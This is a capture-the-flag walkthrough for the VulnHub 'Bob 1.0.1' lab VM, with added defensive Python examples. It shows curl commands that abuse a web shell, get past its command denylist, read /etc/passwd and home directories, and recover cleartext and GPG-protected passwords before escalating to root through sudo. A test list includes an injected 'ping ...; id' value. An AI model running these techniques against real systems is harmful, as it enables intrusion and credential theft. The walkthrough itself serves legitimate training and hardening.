Bob: 1.0.1 ~ Vulnhub - Walkthrough
Latest revision as of 06:48, 1 June 2018
Objective
Acquire root access and get hold of the flag in /
Source: VulnHub.com (https://www.vulnhub.com/entry/bob-101,226/)
Status: [Completed]
Methodology
Define our target
root@kali:# export TANGO=192.168.56.101
Discovery
root@kali:# nmap -O -p- -sT -sV -T5 -o nmap.txt $TANGO
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5b
80/tcp open http Apache httpd 2.4.25 ((Debian))
25468/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
MAC Address: 08:00:27:C0:CC:74 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Entry Point #1 - Port 80 (HTTP)
Enumeration
root@blaksec:~# nikto -h $TANGO
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2018-05-24 18:19:38 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x591 0x5669af30ee8f1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/dev_shell.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/lat_memo.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/passwords.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.html: Admin login page/section found.
+ 7539 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2018-05-24 18:19:49 (GMT-4) (11 seconds)
---------------------------------------------------------------------------
Let's take a closer look at that robots.txt
root@kali:~# curl http://$TANGO/robots.txt
User-agent: *
Disallow: /login.php
Disallow: /dev_shell.php
Disallow: /lat_memo.html
Disallow: /passwords.html
dev_shell.php sounds very promising. Dive dive dive!
Exploitation
After a good 30 minutes of poking it appeared there is some sort of blacklist - commands like ls, pwd, cat and nc are being blocked. Nothing we can't work around though - all we had to do was replace ls with find, echo or dir, and cat with strings (see Exploiting web shells - working your way around blacklisted commands for more sweet workarounds).
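The blacklist on dev_shell.php fails for the usual reason: it matches a handful of program names and nothing else, so any binary that was not listed does the same job. The example below is added here and is not the box's PHP; it contrasts that name-based denylist with an allowlist that fixes both the program and the shape of its arguments and then executes as an argv list rather than through a shell. The DENYLIST set is a constructed stand-in for whatever the VM actually filters, and the three allowlisted commands are assumptions for illustration.

```python
import re
import shlex
import subprocess

# Name-based denylist in the spirit of the filter on dev_shell.php. The box's real filter
# is not shown in the walkthrough; this set is a constructed stand-in for the blocked names.
DENYLIST = {"ls", "pwd", "cat", "nc"}


def denylist_allows(command: str) -> bool:
    """True if a denylist that only looks at the program name would let the command run."""
    try:
        argv = shlex.split(command)
    except ValueError:          # unbalanced quotes
        return False
    return bool(argv) and argv[0] not in DENYLIST


# Allowlist: a fixed set of programs, each with a regex that the *whole* argument
# string must match. Anything not listed, or with unexpected arguments, is rejected.
ALLOWLIST = {
    "uptime": re.compile(r""),
    "df": re.compile(r"(-h)?"),
    "ping": re.compile(r"-c [1-5] [A-Za-z0-9.-]{1,253}"),
}


def allowlist_allows(command: str) -> bool:
    """True only if the program is listed and its arguments match the expected shape."""
    try:
        argv = shlex.split(command)
    except ValueError:
        return False
    if not argv or argv[0] not in ALLOWLIST:
        return False
    return ALLOWLIST[argv[0]].fullmatch(" ".join(argv[1:])) is not None


def run_if_allowed(command: str) -> str:
    """Execute an allowlisted command as an argv list (no shell) and return its stdout."""
    if not allowlist_allows(command):
        raise PermissionError(f"rejected: {command!r}")
    result = subprocess.run(shlex.split(command), capture_output=True, text=True,
                            timeout=10, check=False)
    return result.stdout


if __name__ == "__main__":
    for cmd in ["cat /etc/passwd", "strings /etc/passwd", "find /home",
                "ping -c 3 192.168.56.101", "ping -c 3 192.168.56.101; id"]:
        print(f"{cmd!r:36} denylist={denylist_allows(cmd)!s:5} allowlist={allowlist_allows(cmd)}")
```

The two substitutions from the walkthrough (`strings` for `cat`, `find` for `ls`) sail through `denylist_allows` and are refused by `allowlist_allows`, which never has to know about them: anything outside the listed shapes is rejected by construction.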
Let's see what we have!
root@blaksec:~# curl -s -d "in_command=strings /etc/passwd" -X POST http://$TANGO/dev_shell.php
...
c0rruptedb1t:x:1000:1000:c0rruptedb1t,,,:/home/c0rruptedb1t:/bin/bash
bob:x:1001:1001:Bob,,,,Not the smartest person:/home/bob:/bin/bash
jc:x:1002:1002:James C,,,:/home/jc:/bin/bash
seb:x:1003:1003:Sebastian W,,,:/home/seb:/bin/bash
elliot:x:1004:1004:Elliot A,,,:/home/elliot:/bin/bash
sshd:x:116:65534::/run/sshd:/usr/sbin/nologin
proftpd:x:117:65534::/run/proftpd:/bin/false
ftp:x:118:65534::/srv/ftp:/bin/false
...
Looks like a few regular users on this host. Let's check them out.
curl -s -d "in_command=find /home" -X POST http://$TANGO/dev_shell.php -o files_home.txt
A bunch of goodies turned up! The most notable ones:
/home/seb/proftpd-1.3.3c
/home/bob/.old_passwordfile.html
/home/bob/Documents/Secret
/home/bob/Documents/Secret/Keep_Out
/home/bob/Documents/Secret/Keep_Out/Not_Porn
/home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here
/home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here/notes.sh
/home/bob/Documents/Secret/Keep_Out/Porn
/home/bob/Documents/Secret/Keep_Out/Porn/no_porn_4_u
/home/bob/Documents/staff.txt
/home/bob/Documents/login.txt.gpg
/home/bob/Downloads/Wheel_Of_Fortune.py
/home/bob/Downloads/Hello_Again.py
/home/elliot/theadminisdumb.txt
A quick look through the files... a few quite interesting entries! The last one was fun to read - elliot b*ches and moans about the admin bragging about his new password.. wait.. yei! we have a password!
root@blaksec:~# curl -s -d "in_command=strings /home/elliot/theadminisdumb.txt" -X POST http://$TANGO/dev_shell.php
...
theadminisdumb
...
Aaaaaand we're in!!!
# ssh elliot@$TANGO -p 25468
__ __ _ _ _ _____
| \/ (_) | | / ____|
| \ / |_| | |__ _ _ _ __ __ _ | (___ ___ _ ____ _____ _ __
| |\/| | | | '_ \| | | | '__/ _` | \___ \ / _ \ '__\ \ / / _ \ '__|
| | | | | | |_) | |_| | | | (_| | ____) | __/ | \ V / __/ |
|_| |_|_|_|_.__/ \__,_|_| \__, | |_____/ \___|_| \_/ \___|_|
__/ |
|___/
elliot@192.168.56.101's password:
Linux Milburg-High 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64
elliot@Milburg-High:~$
Poking around /home(s)... seb does not seem to have anything interesting and neither does jc. bob, however, is worth exploring!
elliot@Milburg-High:/home/bob$ cat .old_passwordfile.html
hey n there .old_passwordfile.html
elliot@Milburg-High:/home/bob$ alias
alias cat='echo hey \n there'
*** rolling my eyes ***
elliot@Milburg-High:/home/bob$ strings .old_passwordfile.html
<html>
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
</p>
</html>
I su'd to each of these users just to see if there were any interesting sudo roles, but nothing fun there, so back to bob!
elliot@Milburg-High:/home/bob/Documents$ file login.txt.gpg
file login.txt.gpg
login.txt.gpg: GPG symmetrically encrypted data (AES cipher)
Spent a good hour poking around trying to find the right pass and then found this file. Well, actually I found it earlier and opened it probably 5-6 times.. and then stared at it.. and then squinted.. and it's only when I executed that notes.sh script that it hit me!
elliot@Milburg-High:/home/bob$ ./Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here/notes.sh
-= Notes =-
Harry Potter is my faviorite
Are you the real me?
Right, I'm ordering pizza this is going nowhere
People just don't get me
Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>
Cucumber
Rest now your eyes are sleepy
Are you gonna stop reading this yet?
Time to fix the server
Everyone is annoying
Sticky notes gotta buy em
'HARPOCRATES'
Let's test if it's the right pass.
elliot@Milburg-High:/home/bob/Documents$ gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
<g --batch --passphrase HARPOCRATES -d login.txt.gpg
gpg: keybox '/home/seb/.gnupg/pubring.kbx' created
gpg: AES encrypted data
gpg: encrypted with 1 passphrase
bob:b0bcat_
From here it's pretty much a wrap up
elliot@Milburg-High:/home/bob$ su bob
Password:
bob@Milburg-High:~$ sudo -l
[sudo] password for bob:
Matching Defaults entries for bob on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User bob may run the following commands on localhost:
(ALL : ALL) ALL
bob@Milburg-High:~$ sudo su -
root@Milburg-High:/# strings flag.txt
CONGRATS ON GAINING ROOT
.-.
( )
|~| _.--._
|~|~:'--~' |
| | : #root |
| | : _.--._|
|~|~`'--~'
| |
| |
| |
| |
| |
| |
| |
| |
| |
_____|_|_________ Thanks for playing ~c0rruptedb1t
root@Milburg-High:/#
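The `sudo -l` output above is what a defender would want to catch before an attacker does: `(ALL : ALL) ALL` hands bob the whole box, and `sudo su -` is the one-line consequence. The parser below is an added example, not part of the walkthrough, that reads `sudo -l` output and flags grants amounting to root. `SUDO_L_BOB` is bob's output as shown on this page; `SUDO_L_WEB` is a constructed second sample with a narrower grant, so the audit covers the NOPASSWD and shell-binary cases as well.

```python
import re
from dataclasses import dataclass

# Output of `sudo -l` for bob, as shown in the walkthrough.
SUDO_L_BOB = """\
Matching Defaults entries for bob on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User bob may run the following commands on localhost:
    (ALL : ALL) ALL
"""

# Constructed second sample: a narrower grant that still deserves attention.
SUDO_L_WEB = """\
User www-data may run the following commands on web01:
    (root) NOPASSWD: /usr/bin/systemctl restart apache2, /bin/su -
"""

USER_LINE = re.compile(r"^User (\S+) may run the following commands on (\S+):")
# "(runas) TAG: TAG: cmd1, cmd2" as printed by sudo -l
ENTRY = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$")
SHELLS = {"su", "sh", "bash", "dash", "zsh"}


@dataclass
class SudoEntry:
    user: str
    runas: str
    tags: tuple
    commands: tuple


def parse_sudo_l(output: str) -> list:
    """Parse the 'may run the following commands' section of `sudo -l` output."""
    entries, user, in_cmds = [], None, False
    for line in output.splitlines():
        m = USER_LINE.match(line)
        if m:
            user, in_cmds = m.group(1), True
            continue
        if not in_cmds or not line.strip():
            continue                      # Defaults section or blank line
        e = ENTRY.match(line)
        if not e:
            continue
        tags = tuple(t.rstrip(":") for t in e.group("tags").split())
        commands = tuple(c.strip() for c in e.group("cmds").split(",") if c.strip())
        entries.append(SudoEntry(user, e.group("runas").strip(), tags, commands))
    return entries


def audit(entries) -> list:
    """Return (user, issue) pairs for grants that amount to, or lead straight to, root."""
    issues = []
    for e in entries:
        for cmd in e.commands:
            prog = cmd.split()[0].rsplit("/", 1)[-1]     # basename of the program
            if cmd == "ALL":
                issues.append((e.user, "unrestricted sudo (ALL)"))
            elif prog in SHELLS:
                issues.append((e.user, f"sudo to a shell via {cmd}"))
            elif "NOPASSWD" in e.tags:
                issues.append((e.user, f"passwordless sudo for {cmd}"))
    return issues


if __name__ == "__main__":
    for sample in (SUDO_L_BOB, SUDO_L_WEB):
        for user, issue in audit(parse_sudo_l(sample)):
            print(f"{user}: {issue}")
```

Running this against the output of `sudo -l -U <user>` for each account in /etc/passwd is a cheap periodic check; on this box it would have raised bob's unrestricted grant long before anyone found `login.txt.gpg`.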
Final Notes
Sometimes it is OK to follow your gut feeling and deviate from your own style (e.g. trying to spawn a reverse shell) - fun things can be lying in plain view.
Appendix A: Vulnerability Detail and Mitigation
Insufficiently Protected User Credentials
Rating: High
Description: Copies of user passwords were found stored in clear-text files.
Impact: Taking over an account would allow a perpetrator to use all privileges and functions granted to that account, including but not limited to accessing restricted data and processes, running restricted programs, and elevated access through sudo roles.
Remediation: Put policies in place educating users about the dangers of storing credentials in unprotected files. Establish a process to perform periodic system scans to detect such data.
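The remediation calls for periodic scans that detect credentials left in ordinary files. The scanner below is an added example, not part of the walkthrough, showing what such a scan looks like over a home-directory tree: it flags `user:password` lines like those in `.old_passwordfile.html`, sentences that state a password outright like the one in `theadminisdumb.txt`, and binary or encrypted files whose name suggests credentials, like `login.txt.gpg`. `build_sample_tree` writes a constructed look-alike of the files the walkthrough lists into a temporary directory; the file contents are modelled on the page but the prose in `theadminisdumb.txt` is made up here. The patterns are heuristics and will miss passwords that do not follow these shapes.

```python
import os
import re
import tempfile
from pathlib import Path

# A "user:password" line, as found in .old_passwordfile.html on the box. The lookahead
# skips /etc/passwd-style "user:x:" records and "scheme://" URLs to cut false positives.
USER_PASS_LINE = re.compile(r"^\s*([a-z_][a-z0-9_-]{0,31}):(?!x:|\*:|!:|//)(\S{4,})\s*$", re.M)
# A sentence that states a password outright ("my password is ...", "password: ...").
STATED_PASSWORD = re.compile(r"\b(?:password|passwd|passphrase)\b\s*(?:is|:|=|to)\s*\S+", re.I)
# Filenames worth flagging even when the content cannot be read (encrypted, binary).
CRED_NAME = re.compile(r"pass|cred|login|secret", re.I)
MAX_BYTES = 1 << 20


def scan_file(path: Path) -> list:
    """Return a list of finding dicts for one file (empty if nothing suspicious)."""
    findings = []
    try:
        st = path.stat()
        data = path.read_bytes()[:MAX_BYTES]
    except OSError:
        return findings
    world_readable = bool(st.st_mode & 0o004)

    def add(reason):
        findings.append({"path": str(path), "reason": reason, "world_readable": world_readable})

    if b"\x00" in data[:4096]:            # binary or encrypted: judge by name only
        if CRED_NAME.search(path.name):
            add("credential-like filename on binary/encrypted content")
        return findings
    text = data.decode("utf-8", errors="replace")
    for m in USER_PASS_LINE.finditer(text):
        add(f"user:password pair ({m.group(1)})")
    if STATED_PASSWORD.search(text):
        add("password stated in text")
    return findings


def scan_tree(root) -> list:
    """Walk a directory tree (dotfiles included) and collect findings from every file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            findings.extend(scan_file(Path(dirpath) / name))
    return sorted(findings, key=lambda f: (f["path"], f["reason"]))


def summarize(findings) -> list:
    """(basename, reason) pairs, sorted, for reporting or testing."""
    return sorted((os.path.basename(f["path"]), f["reason"]) for f in findings)


def build_sample_tree() -> Path:
    """Constructed /home look-alike modelled on the files the walkthrough lists."""
    root = Path(tempfile.mkdtemp(prefix="home_"))
    samples = {
        "bob/.old_passwordfile.html":
            "<html>\n<p>\njc:Qwerty\nseb:T1tanium_Pa$$word_Hack3rs_Fear_M3\n</p>\n</html>\n",
        "bob/Documents/staff.txt": "Staff roster\nJames C - IT\nSebastian W - Facilities\n",
        "elliot/theadminisdumb.txt":
            "The admin keeps bragging that his new password is theadminisdumb. Unreal.\n",
    }
    for rel, body in samples.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body)
    # Stand-in for login.txt.gpg: an opaque blob containing NUL bytes (constructed, not real GPG data).
    (root / "bob/Documents/login.txt.gpg").write_bytes(b"\x8c\x0d\x04\x07\x03\x02" + bytes(range(256)))
    return root


if __name__ == "__main__":
    for name, reason in summarize(scan_tree(build_sample_tree())):
        print(f"{name}: {reason}")
```

Pointed at a real /home this would be run from a privileged cron job and its output shipped to whatever handles alerts; anything flagged with `world_readable` set is the first thing to chase, since that is exactly the condition that let elliot read bob's files here.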